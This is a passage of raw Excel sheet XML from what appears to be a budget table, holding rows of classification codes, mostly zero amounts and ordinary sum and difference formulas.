      <c r="Z818" s="17"/>
      <c r="AA818" s="17"/>
      <c r="AB818" s="17"/>
      <c r="AC818" s="17"/>
      <c r="AD818" s="17"/>
      <c r="AE818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AF818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AG818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AH818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AI818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AJ818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AK818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AL818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AM818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AN818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AO818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AP818" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
    </row>
    <row r="819" ht="18" customHeight="1" spans="1:42">
      <c r="A819" s="10"/>
      <c r="B819" s="10"/>
      <c r="C819" s="28"/>
      <c r="D819" s="10">
        <v>2111410</v>
      </c>
      <c r="E819" s="16" t="s">
        <v>3614</v>
      </c>
      <c r="F819" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G819" s="17"/>
      <c r="H819" s="17"/>
      <c r="I819" s="17"/>
      <c r="J819" s="17"/>
      <c r="K819" s="17"/>
      <c r="L819" s="17"/>
      <c r="M819" s="17"/>
      <c r="N819" s="17"/>
      <c r="O819" s="17"/>
      <c r="P819" s="17"/>
      <c r="Q819" s="17"/>
      <c r="R819" s="17"/>
      <c r="S819" s="17"/>
      <c r="T819" s="17"/>
      <c r="U819" s="17"/>
      <c r="V819" s="17"/>
      <c r="W819" s="17"/>
      <c r="X819" s="17"/>
      <c r="Y819" s="17"/>
      <c r="Z819" s="17"/>
      <c r="AA819" s="17"/>
      <c r="AB819" s="17"/>
      <c r="AC819" s="17"/>
      <c r="AD819" s="17"/>
      <c r="AE819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AF819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AG819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AH819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AI819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AJ819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AK819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AL819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AM819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AN819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AO819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AP819" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
    </row>
    <row r="820" ht="18" customHeight="1" spans="1:42">
      <c r="A820" s="10"/>
      <c r="B820" s="10"/>
      <c r="C820" s="28"/>
      <c r="D820" s="10">
        <v>2111411</v>
      </c>
      <c r="E820" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F820" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G820" s="17"/>
      <c r="H820" s="17"/>
      <c r="I820" s="17"/>
      <c r="J820" s="17"/>
      <c r="K820" s="17"/>
      <c r="L820" s="17"/>
      <c r="M820" s="17"/>
      <c r="N820" s="17"/>
      <c r="O820" s="17"/>
      <c r="P820" s="17"/>
      <c r="Q820" s="17"/>
      <c r="R820" s="17"/>
      <c r="S820" s="17"/>
      <c r="T820" s="17"/>
      <c r="U820" s="17"/>
      <c r="V820" s="17"/>
      <c r="W820" s="17"/>
      <c r="X820" s="17"/>
      <c r="Y820" s="17"/>
      <c r="Z820" s="17"/>
      <c r="AA820" s="17"/>
      <c r="AB820" s="17"/>
      <c r="AC820" s="17"/>
      <c r="AD820" s="17"/>
      <c r="AE820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AF820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AG820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AH820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AI820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AJ820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AK820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AL820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AM820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AN820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AO820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AP820" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
    </row>
    <row r="821" ht="18" customHeight="1" spans="1:42">
      <c r="A821" s="10"/>
      <c r="B821" s="10"/>
      <c r="C821" s="28"/>
      <c r="D821" s="10">
        <v>2111413</v>
      </c>
      <c r="E821" s="16" t="s">
        <v>3615</v>
      </c>
      <c r="F821" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G821" s="17"/>
      <c r="H821" s="17"/>
      <c r="I821" s="17"/>
      <c r="J821" s="17"/>
      <c r="K821" s="17"/>
      <c r="L821" s="17"/>
      <c r="M821" s="17"/>
      <c r="N821" s="17"/>
      <c r="O821" s="17"/>
      <c r="P821" s="17"/>
      <c r="Q821" s="17"/>
      <c r="R821" s="17"/>
      <c r="S821" s="17"/>
      <c r="T821" s="17"/>
      <c r="U821" s="17"/>
      <c r="V821" s="17"/>
      <c r="W821" s="17"/>
      <c r="X821" s="17"/>
      <c r="Y821" s="17"/>
      <c r="Z821" s="17"/>
      <c r="AA821" s="17"/>
      <c r="AB821" s="17"/>
      <c r="AC821" s="17"/>
      <c r="AD821" s="17"/>
      <c r="AE821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AF821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AG821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AH821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AI821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AJ821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AK821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AL821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AM821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AN821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AO821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AP821" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
    </row>
    <row r="822" ht="18" customHeight="1" spans="1:42">
      <c r="A822" s="10"/>
      <c r="B822" s="10"/>
      <c r="C822" s="28"/>
      <c r="D822" s="10">
        <v>2111450</v>
      </c>
      <c r="E822" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F822" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G822" s="17"/>
      <c r="H822" s="17"/>
      <c r="I822" s="17"/>
      <c r="J822" s="17"/>
      <c r="K822" s="17"/>
      <c r="L822" s="17"/>
      <c r="M822" s="17"/>
      <c r="N822" s="17"/>
      <c r="O822" s="17"/>
      <c r="P822" s="17"/>
      <c r="Q822" s="17"/>
      <c r="R822" s="17"/>
      <c r="S822" s="17"/>
      <c r="T822" s="17"/>
      <c r="U822" s="17"/>
      <c r="V822" s="17"/>
      <c r="W822" s="17"/>
      <c r="X822" s="17"/>
      <c r="Y822" s="17"/>
      <c r="Z822" s="17"/>
      <c r="AA822" s="17"/>
      <c r="AB822" s="17"/>
      <c r="AC822" s="17"/>
      <c r="AD822" s="17"/>
      <c r="AE822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AF822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AG822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AH822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AI822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AJ822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AK822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AL822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AM822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AN822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AO822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AP822" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
    </row>
    <row r="823" ht="18" customHeight="1" spans="1:42">
      <c r="A823" s="10"/>
      <c r="B823" s="10"/>
      <c r="C823" s="28"/>
      <c r="D823" s="10">
        <v>2111499</v>
      </c>
      <c r="E823" s="16" t="s">
        <v>3616</v>
      </c>
      <c r="F823" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G823" s="17"/>
      <c r="H823" s="17"/>
      <c r="I823" s="17"/>
      <c r="J823" s="17"/>
      <c r="K823" s="17"/>
      <c r="L823" s="17"/>
      <c r="M823" s="17"/>
      <c r="N823" s="17"/>
      <c r="O823" s="17"/>
      <c r="P823" s="17"/>
      <c r="Q823" s="17"/>
      <c r="R823" s="17"/>
      <c r="S823" s="17"/>
      <c r="T823" s="17"/>
      <c r="U823" s="17"/>
      <c r="V823" s="17"/>
      <c r="W823" s="17"/>
      <c r="X823" s="17"/>
      <c r="Y823" s="17"/>
      <c r="Z823" s="17"/>
      <c r="AA823" s="17"/>
      <c r="AB823" s="17"/>
      <c r="AC823" s="17"/>
      <c r="AD823" s="17"/>
      <c r="AE823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AF823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AG823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AH823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AI823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AJ823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AK823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AL823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AM823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AN823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AO823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
      <c r="AP823" s="17">
        <f t="shared" si="410"/>
        <v>0</v>
      </c>
    </row>
    <row r="824" ht="18" customHeight="1" spans="1:42">
      <c r="A824" s="10"/>
      <c r="B824" s="10"/>
      <c r="C824" s="31"/>
      <c r="D824" s="10">
        <v>21199</v>
      </c>
      <c r="E824" s="11" t="s">
        <v>3617</v>
      </c>
      <c r="F824" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G824" s="12">
        <f t="shared" ref="G824:R824" si="411">G825</f>
        <v>0</v>
      </c>
      <c r="H824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="I824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="J824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="K824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="L824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="M824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="N824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="O824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="P824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="Q824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="R824" s="12">
        <f t="shared" si="411"/>
        <v>0</v>
      </c>
      <c r="S824" s="12">
        <v>0</v>
      </c>
      <c r="T824" s="12">
        <v>0</v>
      </c>
      <c r="U824" s="12">
        <v>0</v>
      </c>
      <c r="V824" s="12">
        <v>0</v>
      </c>
      <c r="W824" s="12">
        <v>0</v>
      </c>
      <c r="X824" s="12">
        <v>0</v>
      </c>
      <c r="Y824" s="12">
        <v>0</v>
      </c>
      <c r="Z824" s="12">
        <v>0</v>
      </c>
      <c r="AA824" s="12">
        <v>0</v>
      </c>
      <c r="AB824" s="12">
        <v>0</v>
      </c>
      <c r="AC824" s="12">
        <v>0</v>
      </c>
      <c r="AD824" s="12">
        <v>0</v>
      </c>
      <c r="AE824" s="12">
        <f t="shared" ref="AE824:AP824" si="412">AE825</f>
        <v>0</v>
      </c>
      <c r="AF824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
      <c r="AG824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
      <c r="AH824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
      <c r="AI824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
      <c r="AJ824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
      <c r="AK824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
      <c r="AL824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
      <c r="AM824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
      <c r="AN824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
      <c r="AO824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
      <c r="AP824" s="12">
        <f t="shared" si="412"/>
        <v>0</v>
      </c>
    </row>
    <row r="825" ht="18" customHeight="1" spans="1:42">
      <c r="A825" s="10"/>
      <c r="B825" s="10"/>
      <c r="C825" s="31"/>
      <c r="D825" s="10">
        <v>2119999</v>
      </c>
      <c r="E825" s="16" t="s">
        <v>3618</v>
      </c>
      <c r="F825" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G825" s="17"/>
      <c r="H825" s="17"/>
      <c r="I825" s="17"/>
      <c r="J825" s="17"/>
      <c r="K825" s="17"/>
      <c r="L825" s="17"/>
      <c r="M825" s="17"/>
      <c r="N825" s="17"/>
      <c r="O825" s="17"/>
      <c r="P825" s="17"/>
      <c r="Q825" s="17"/>
      <c r="R825" s="17"/>
      <c r="S825" s="17"/>
      <c r="T825" s="17"/>
      <c r="U825" s="17"/>
      <c r="V825" s="17"/>
      <c r="W825" s="17"/>
      <c r="X825" s="17"/>
      <c r="Y825" s="17"/>
      <c r="Z825" s="17"/>
      <c r="AA825" s="17"/>
      <c r="AB825" s="17"/>
      <c r="AC825" s="17"/>
      <c r="AD825" s="17"/>
      <c r="AE825" s="17">
        <f>G825-S825</f>
        <v>0</v>
      </c>
      <c r="AF825" s="17">
        <f t="shared" ref="AF825:AP825" si="413">H825-T825</f>
        <v>0</v>
      </c>
      <c r="AG825" s="17">
        <f t="shared" si="413"/>
        <v>0</v>
      </c>
      <c r="AH825" s="17">
        <f t="shared" si="413"/>
        <v>0</v>
      </c>
      <c r="AI825" s="17">
        <f t="shared" si="413"/>
        <v>0</v>
      </c>
      <c r="AJ825" s="17">
        <f t="shared" si="413"/>
        <v>0</v>
      </c>
      <c r="AK825" s="17">
        <f t="shared" si="413"/>
        <v>0</v>
      </c>
      <c r="AL825" s="17">
        <f t="shared" si="413"/>
        <v>0</v>
      </c>
      <c r="AM825" s="17">
        <f t="shared" si="413"/>
        <v>0</v>
      </c>
      <c r="AN825" s="17">
        <f t="shared" si="413"/>
        <v>0</v>
      </c>
      <c r="AO825" s="17">
        <f t="shared" si="413"/>
        <v>0</v>
      </c>
      <c r="AP825" s="17">
        <f t="shared" si="413"/>
        <v>0</v>
      </c>
    </row>
    <row r="826" ht="18" customHeight="1" spans="1:42">
      <c r="A826" s="10"/>
      <c r="B826" s="10"/>
      <c r="C826" s="31"/>
      <c r="D826" s="10">
        <v>212</v>
      </c>
      <c r="E826" s="11" t="s">
        <v>3619</v>
      </c>
      <c r="F826" s="14">
        <f t="shared" si="380"/>
        <v>2285</v>
      </c>
      <c r="G826" s="12">
        <f t="shared" ref="G826:R826" si="414">G827+G838+G840+G843+G845+G847</f>
        <v>446</v>
      </c>
      <c r="H826" s="12">
        <f t="shared" si="414"/>
        <v>232</v>
      </c>
      <c r="I826" s="12">
        <f t="shared" si="414"/>
        <v>50</v>
      </c>
      <c r="J826" s="12">
        <f t="shared" si="414"/>
        <v>0</v>
      </c>
      <c r="K826" s="12">
        <f t="shared" si="414"/>
        <v>156</v>
      </c>
      <c r="L826" s="12">
        <f t="shared" si="414"/>
        <v>1845</v>
      </c>
      <c r="M826" s="12">
        <f t="shared" si="414"/>
        <v>30</v>
      </c>
      <c r="N826" s="12">
        <f t="shared" si="414"/>
        <v>0</v>
      </c>
      <c r="O826" s="12">
        <f t="shared" si="414"/>
        <v>1</v>
      </c>
      <c r="P826" s="12">
        <f t="shared" si="414"/>
        <v>158</v>
      </c>
      <c r="Q826" s="12">
        <f t="shared" si="414"/>
        <v>0</v>
      </c>
      <c r="R826" s="12">
        <f t="shared" si="414"/>
        <v>45</v>
      </c>
      <c r="S826" s="12">
        <v>260</v>
      </c>
      <c r="T826" s="12">
        <v>228</v>
      </c>
      <c r="U826" s="12">
        <v>50</v>
      </c>
      <c r="V826" s="12">
        <v>0</v>
      </c>
      <c r="W826" s="12">
        <v>146</v>
      </c>
      <c r="X826" s="12">
        <v>1415</v>
      </c>
      <c r="Y826" s="12">
        <v>30</v>
      </c>
      <c r="Z826" s="12">
        <v>0</v>
      </c>
      <c r="AA826" s="12">
        <v>1</v>
      </c>
      <c r="AB826" s="12">
        <v>158</v>
      </c>
      <c r="AC826" s="12">
        <v>0</v>
      </c>
      <c r="AD826" s="12">
        <v>45</v>
      </c>
      <c r="AE826" s="12">
        <f t="shared" ref="AE826:AP826" si="415">AE827+AE838+AE840+AE843+AE845+AE847</f>
        <v>186</v>
      </c>
      <c r="AF826" s="12">
        <f t="shared" si="415"/>
        <v>4</v>
      </c>
      <c r="AG826" s="12">
        <f t="shared" si="415"/>
        <v>0</v>
      </c>
      <c r="AH826" s="12">
        <f t="shared" si="415"/>
        <v>0</v>
      </c>
      <c r="AI826" s="12">
        <f t="shared" si="415"/>
        <v>10</v>
      </c>
      <c r="AJ826" s="12">
        <f t="shared" si="415"/>
        <v>430</v>
      </c>
      <c r="AK826" s="12">
        <f t="shared" si="415"/>
        <v>0</v>
      </c>
      <c r="AL826" s="12">
        <f t="shared" si="415"/>
        <v>0</v>
      </c>
      <c r="AM826" s="12">
        <f t="shared" si="415"/>
        <v>0</v>
      </c>
      <c r="AN826" s="12">
        <f t="shared" si="415"/>
        <v>0</v>
      </c>
      <c r="AO826" s="12">
        <f t="shared" si="415"/>
        <v>0</v>
      </c>
      <c r="AP826" s="12">
        <f t="shared" si="415"/>
        <v>0</v>
      </c>
    </row>
    <row r="827" ht="18" customHeight="1" spans="1:42">
      <c r="A827" s="10"/>
      <c r="B827" s="10"/>
      <c r="C827" s="31"/>
      <c r="D827" s="10">
        <v>21201</v>
      </c>
      <c r="E827" s="11" t="s">
        <v>3620</v>
      </c>
      <c r="F827" s="14">
        <f t="shared" si="380"/>
        <v>73</v>
      </c>
      <c r="G827" s="12">
        <f t="shared" ref="G827:R827" si="416">SUM(G828:G837)</f>
        <v>146</v>
      </c>
      <c r="H827" s="12">
        <f t="shared" si="416"/>
        <v>33</v>
      </c>
      <c r="I827" s="12">
        <f t="shared" si="416"/>
        <v>0</v>
      </c>
      <c r="J827" s="12">
        <f t="shared" si="416"/>
        <v>0</v>
      </c>
      <c r="K827" s="12">
        <f t="shared" si="416"/>
        <v>64</v>
      </c>
      <c r="L827" s="12">
        <f t="shared" si="416"/>
        <v>6</v>
      </c>
      <c r="M827" s="12">
        <f t="shared" si="416"/>
        <v>3</v>
      </c>
      <c r="N827" s="12">
        <f t="shared" si="416"/>
        <v>0</v>
      </c>
      <c r="O827" s="12">
        <f t="shared" si="416"/>
        <v>0</v>
      </c>
      <c r="P827" s="12">
        <f t="shared" si="416"/>
        <v>0</v>
      </c>
      <c r="Q827" s="12">
        <f t="shared" si="416"/>
        <v>0</v>
      </c>
      <c r="R827" s="12">
        <f t="shared" si="416"/>
        <v>0</v>
      </c>
      <c r="S827" s="12">
        <v>131</v>
      </c>
      <c r="T827" s="12">
        <v>29</v>
      </c>
      <c r="U827" s="12">
        <v>0</v>
      </c>
      <c r="V827" s="12">
        <v>0</v>
      </c>
      <c r="W827" s="12">
        <v>58</v>
      </c>
      <c r="X827" s="12">
        <v>6</v>
      </c>
      <c r="Y827" s="12">
        <v>3</v>
      </c>
      <c r="Z827" s="12">
        <v>0</v>
      </c>
      <c r="AA827" s="12">
        <v>0</v>
      </c>
      <c r="AB827" s="12">
        <v>0</v>
      </c>
      <c r="AC827" s="12">
        <v>0</v>
      </c>
      <c r="AD827" s="12">
        <v>0</v>
      </c>
      <c r="AE827" s="12">
        <f t="shared" ref="AE827:AP827" si="417">SUM(AE828:AE837)</f>
        <v>15</v>
      </c>
      <c r="AF827" s="12">
        <f t="shared" si="417"/>
        <v>4</v>
      </c>
      <c r="AG827" s="12">
        <f t="shared" si="417"/>
        <v>0</v>
      </c>
      <c r="AH827" s="12">
        <f t="shared" si="417"/>
        <v>0</v>
      </c>
      <c r="AI827" s="12">
        <f t="shared" si="417"/>
        <v>6</v>
      </c>
      <c r="AJ827" s="12">
        <f t="shared" si="417"/>
        <v>0</v>
      </c>
      <c r="AK827" s="12">
        <f t="shared" si="417"/>
        <v>0</v>
      </c>
      <c r="AL827" s="12">
        <f t="shared" si="417"/>
        <v>0</v>
      </c>
      <c r="AM827" s="12">
        <f t="shared" si="417"/>
        <v>0</v>
      </c>
      <c r="AN827" s="12">
        <f t="shared" si="417"/>
        <v>0</v>
      </c>
      <c r="AO827" s="12">
        <f t="shared" si="417"/>
        <v>0</v>
      </c>
      <c r="AP827" s="12">
        <f t="shared" si="417"/>
        <v>0</v>
      </c>
    </row>
    <row r="828" ht="18" customHeight="1" spans="1:42">
      <c r="A828" s="10"/>
      <c r="B828" s="10"/>
      <c r="C828" s="31"/>
      <c r="D828" s="10">
        <v>2120101</v>
      </c>
      <c r="E828" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F828" s="14">
        <f t="shared" si="380"/>
        <v>58</v>
      </c>
      <c r="G828" s="17">
        <v>146</v>
      </c>
      <c r="H828" s="17">
        <v>30</v>
      </c>
      <c r="I828" s="17"/>
      <c r="J828" s="17"/>
      <c r="K828" s="17">
        <v>52</v>
      </c>
      <c r="L828" s="17">
        <v>3</v>
      </c>
      <c r="M828" s="17">
        <v>3</v>
      </c>
      <c r="N828" s="17"/>
      <c r="O828" s="17"/>
      <c r="P828" s="17"/>
      <c r="Q828" s="17"/>
      <c r="R828" s="17"/>
      <c r="S828" s="17">
        <v>131</v>
      </c>
      <c r="T828" s="17">
        <v>26</v>
      </c>
      <c r="U828" s="17"/>
      <c r="V828" s="17"/>
      <c r="W828" s="17">
        <v>47</v>
      </c>
      <c r="X828" s="17">
        <v>3</v>
      </c>
      <c r="Y828" s="17">
        <v>3</v>
      </c>
      <c r="Z828" s="17"/>
      <c r="AA828" s="17"/>
      <c r="AB828" s="17"/>
      <c r="AC828" s="17"/>
      <c r="AD828" s="17"/>
      <c r="AE828" s="17">
        <f t="shared" ref="AE828:AP837" si="418">G828-S828</f>
        <v>15</v>
      </c>
      <c r="AF828" s="17">
        <f t="shared" si="418"/>
        <v>4</v>
      </c>
      <c r="AG828" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AH828" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AI828" s="17">
        <f t="shared" si="418"/>
        <v>5</v>
      </c>
      <c r="AJ828" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AK828" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AL828" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AM828" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AN828" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AO828" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AP828" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
    </row>
    <row r="829" ht="18" customHeight="1" spans="1:42">
      <c r="A829" s="10"/>
      <c r="B829" s="10"/>
      <c r="C829" s="31"/>
      <c r="D829" s="10">
        <v>2120102</v>
      </c>
      <c r="E829" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F829" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G829" s="17"/>
      <c r="H829" s="17"/>
      <c r="I829" s="17"/>
      <c r="J829" s="17"/>
      <c r="K829" s="17"/>
      <c r="L829" s="17"/>
      <c r="M829" s="17"/>
      <c r="N829" s="17"/>
      <c r="O829" s="17"/>
      <c r="P829" s="17"/>
      <c r="Q829" s="17"/>
      <c r="R829" s="17"/>
      <c r="S829" s="17"/>
      <c r="T829" s="17"/>
      <c r="U829" s="17"/>
      <c r="V829" s="17"/>
      <c r="W829" s="17"/>
      <c r="X829" s="17"/>
      <c r="Y829" s="17"/>
      <c r="Z829" s="17"/>
      <c r="AA829" s="17"/>
      <c r="AB829" s="17"/>
      <c r="AC829" s="17"/>
      <c r="AD829" s="17"/>
      <c r="AE829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AF829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AG829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AH829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AI829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AJ829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AK829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AL829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AM829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AN829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AO829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AP829" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
    </row>
    <row r="830" ht="18" customHeight="1" spans="1:42">
      <c r="A830" s="10"/>
      <c r="B830" s="10"/>
      <c r="C830" s="31"/>
      <c r="D830" s="10">
        <v>2120103</v>
      </c>
      <c r="E830" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F830" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G830" s="17"/>
      <c r="H830" s="17"/>
      <c r="I830" s="17"/>
      <c r="J830" s="17"/>
      <c r="K830" s="17"/>
      <c r="L830" s="17"/>
      <c r="M830" s="17"/>
      <c r="N830" s="17"/>
      <c r="O830" s="17"/>
      <c r="P830" s="17"/>
      <c r="Q830" s="17"/>
      <c r="R830" s="17"/>
      <c r="S830" s="17"/>
      <c r="T830" s="17"/>
      <c r="U830" s="17"/>
      <c r="V830" s="17"/>
      <c r="W830" s="17"/>
      <c r="X830" s="17"/>
      <c r="Y830" s="17"/>
      <c r="Z830" s="17"/>
      <c r="AA830" s="17"/>
      <c r="AB830" s="17"/>
      <c r="AC830" s="17"/>
      <c r="AD830" s="17"/>
      <c r="AE830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AF830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AG830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AH830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AI830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AJ830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AK830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AL830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AM830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AN830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AO830" s="17">
        <f t="shared" si="418"/>
